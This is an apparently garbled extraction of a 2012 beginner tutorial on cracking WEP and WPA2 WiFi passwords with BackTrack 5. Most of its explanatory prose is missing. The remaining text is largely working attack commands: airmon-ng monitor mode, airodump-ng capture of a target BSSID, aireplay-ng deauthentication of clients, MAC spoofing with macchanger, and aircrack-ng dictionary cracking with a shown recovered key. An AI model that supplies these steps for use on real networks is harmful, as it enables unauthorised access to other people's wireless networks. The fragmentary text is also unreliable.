Professional Documents
Culture Documents
01010101010101010101001010101
01010101010101010101010101011
01010110101001010101001010010
WiFi Internet Connection Hacking
10010100101010101010101010101
WEP,WPA2 Penetration Testing
01010101010101010101010101010
3thic0kiddi3
10101010101010101010101010101
01010101010101101010101010101
01011010101010101010101010101
01010101010101010101010101010
10101010101010101010101010101
01010101010101010101010101001
01010101010010101010010101010
01101010010101010101010101010
10110101010101010101010101010
10101010101010101010101010100
5/27/2012
For Myanmar IT Begineers (Myanmar version)
Educational Purpose Only
Beginner Level
WEP WPA
..
Laptop Browser
Back Track 5 www.backtrack-linux.org
Back Track 5R2 Back Track 5 Download
GNOME 32 Bit VM Ware Direct
Back Track 5 Zip
VM ware www.vmware.com/products/player
VM ware
VM ware Install
File >open virtual machine Back Track 5 zip
Windows 7 Back
Track 5 Back Track Linux
Security Hacker
Linux Back Track
(WEP Cracking)
Wifi WEP WPA WPA2
Google Beginner WEP
WPA WEP
WEP
Connector
WEP, WPA2-PSK
Wireless USB adapter VM ware
Back Track 5 Back Track Terminal Terminal
Windows cmd Command
Command
airmon-ng Enter Interface ,Chipset wlan0 adapter
detail Adapter BT5
laptopdct WEP
WPA2
Laptopdct BSSID
C8:3A:35:2F:E7:30 BSSID CH CH Channel
laptopdct Channel (CH) 11 Command
airodump-ng w tuan c 11 --bssid C8:3A:35:2F:E7:30 mon0
Data C8:3A:35:2F:E7:30
BSSID Aireplay command
-1 0 2 3
Command
Data
Data Read packet Crack
aircrack-ng tuan-01.cap Tuan
tuan
A3:B5:C11:34:U7:F8:9Q:33 A3B5C1134U7F89Q33
WEP Cracking
WEP
Wifi WEP WPA2
WEP BSSID
Restart Network
Crack Computer
Mac address Filter
WPA2 Cracking ( )
()
WEP WPA
.WPA2 Packet Sniffing ?Dictionary
attack Beginner Dictionary attack
Packet Sniffing Dictionary attack
password Wordlist Crack
WPA2 special character Strong Password
wordlist
WPA2 Dictionary att
Target
wordlist
-c 1 Channel no.
Command Terminal
aireplay-ng -0 0 -a {BSSID } -c {Client Mac} mon0 Enter
Command
WPA2 Hacking
WPA2 Cracking ()
WPA2 Crack Mac Changer Method
Mac Change Client
Command airmon-ng start wlan0
ifconfig mon0 down Enter
MAC macchanger -m 00:11:22:33:44:55 mon0
Fake Mac MaC
00:11:22:33:44:55
ifconfig mon0 up
airodump-ng mon0
WPA2 Victima Target
Target Command
airodump-ng -c 6 --bssid 1C:7E:E5:32:1D:54 -w crack mon0
(- Channel No. BSSID No. Target )
Target Data
Terminal
aireplay-ng -0 30 -a {B
SSID} -c {Client Mac} mon0
Terminal
aircrack-ng -w /root/Desktop/darkc0de.lst crack-01.cap Enter
Key Found=abril4de1969
Cracking Time
WPA2 Cracking ()
WPA2
WPA 2 Password Default
Password Mac address
Filter
Hide
Wordlist
Hack restart
Share
3thic0kiddi3@gmail.com Hacking Cyber Law
2nd Edition
3thic0kiddi3
3thic0kiddi3@gmail.com